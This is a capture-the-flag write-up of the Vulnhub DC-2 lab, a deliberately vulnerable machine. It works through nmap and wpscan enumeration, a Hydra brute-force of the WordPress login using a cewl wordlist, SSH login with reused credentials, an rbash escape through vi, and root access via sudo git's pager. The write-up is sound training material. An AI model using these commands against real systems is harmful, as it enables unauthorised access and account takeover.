---
title: "Vulnhub: DC-2"
pubDatetime: 2019-03-24T20:16:07.000Z
tags: ["vulnhub", "writeup"]
description: "Today we are solving DC-2. This machine is created by DCAU7 who also created DC-1.
Even though the machine is for beginners I figured I could try and solve it anyway."
---
## Info

**Name**: DC-2  
**Operating System**: Linux  
**Url**: [http://www.five86.com/dc-2.html](http://www.five86.com/dc-2.html)  
**Release**: 22 Mar 2019  
**Difficulty**: Beginner  
**Description**: Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.  
As with the original DC-1, it's designed with beginners in mind.  
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

## Enumeration

Starting with a regular nmap scan we see that only one port is open.

```bash
nmap -sC -sV 192.168.1.139
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-24 20:10 CET
Nmap scan report for dc-2 (192.168.1.139)
Host is up (0.000079s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
MAC Address: 00:0C:29:31:D7:6F (VMware)
```

But doing a scan on all ports reveals that another port is open.

```bash
nmap -p- -sC -sV 192.168.1.139
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-24 20:12 CET
Nmap scan report for dc-2 (192.168.1.139)
Host is up (0.000054s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:31:D7:6F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Going to the website we find a Wordpress install and also Flag #1.

![](/images/2019/03/dc2-wordpress.png)

The webpage mentions `cewl` which is a program that can generate password list by crawling web pages for different words.  
We will use `cewl` shortly to generate our password list.

Knowing we're dealing with a Wordpress install, we can use `wpscan` to enumerate wordpress for usernames.  
Running the following command revels three usernames `wpscan --enumerate u --url dc-2`

```bash
[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jerry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

Awesome! We now have three usernames which I added to `users.txt`  
Now, let's generate a password list and see if we can bruteforce the Wordpress login.

```bash
cewl -m 2 -w passwords.txt http://dc-2
CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
```

The passwords generated from crawling the web page is now stored in `passwords.txt`.  
After using `cewl` we have 263 different passwords.

```bash
wc -l passwords.txt 
263 passwords.txt
```

Now, let's use Hydra to bruteforce the Wordpress login. Using the usernames we found when running `wpscan` and the passwords from `cewl`.

```bash
hydra -L users.txt -P passwords.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-03-24 20:33:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 789 login tries (l:3/p:263), ~50 tries per task
[DATA] attacking http-post-form://dc-2:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location
[80][http-post-form] host: dc-2   login: tom   password: parturient
[STATUS] 554.00 tries/min, 554 tries in 00:01h, 235 to do in 00:01h, 16 active
[80][http-post-form] host: dc-2   login: jerry   password: adipiscing
1 of 1 target successfully completed, 2 valid passwords found
```

We successfully bruteforced the passwords for `tom` and `jerry`.  
Logging into Wordpress reveals flag #2 and a hint for what we should do next.

![](/images/2019/03/wp-flag2.png)

## Initial Foothold

Poking around we find nothing else interesting. But knowing people tend to use the same password across services, let's see if the username/password combinations also works for ssh.

We can't ssh in as `jerry` but we successfully get in as `tom`.

```bash
root@kali:~# ssh tom@dc-2 -p 7744
tom@dc-2's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Mar 24 16:41:21 2019 from 192.168.1.115
tom@DC-2:~$ id
-rbash: id: command not found
```

... And we're stuck in `rbash`.

Looking around we find that we have access to `vi`. Breaking out of jail should be a piece of cake.

After opening `vi` we can do this to break out of `rbash`.

```bash
:set shell=/bin/sh
:shell
```

```bash
$ whoami
/bin/sh: 2: whoami: not found
```

Sweet! We just need to restore our $PATH so we can run all programs we have access to.

```bash
$ export PATH=/usr/sbin:/usr/bin:/sbin:/bin
```

```bash
$ id
uid=1001(tom) gid=1001(tom) groups=1001(tom)
```

We can now also cat flag #3.

```bash
$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
```

## Privilege Escalation

Always, I mean _always_ try the low hanging fruit first. Maybe `sudo`?

```bash
$ sudo -l
[sudo] password for tom:
Sorry, user tom may not run sudo on DC-2.
```

Okay, maybe not. But how about changing user to `jerry` with his password?

```bash
$ su jerry 
Password: 
jerry@DC-2:/home/tom$
```

And looking at flag #4.

```bash
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!
```

I mean, the last line kinda spoils the way to root, but anyways.

Checking the low hanging fruit reveals we can run `sudo /usr/bin/git`.

```bash
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
```

Knowing we can get command execution using git, getting a root shell should be really easy now.

By executing the following command we're dropped into the manual pages of `git`.

```bash
sudo git help status
```

From here we can execute commands and thus get a root shell doing the following.

```bash
!/bin/bash
```

```bash
root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
```

[B99 Holt GIF](https://tenor.com/view/b99-holt-hot-happy-gif-12413803) from [B99 GIFs](https://tenor.com/search/b99-gifs)

## Further Reading

[https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)

[http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/](http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/)

[https://digi.ninja/projects/cewl.php](https://digi.ninja/projects/cewl.php)

[https://wpscan.org/](https://wpscan.org/)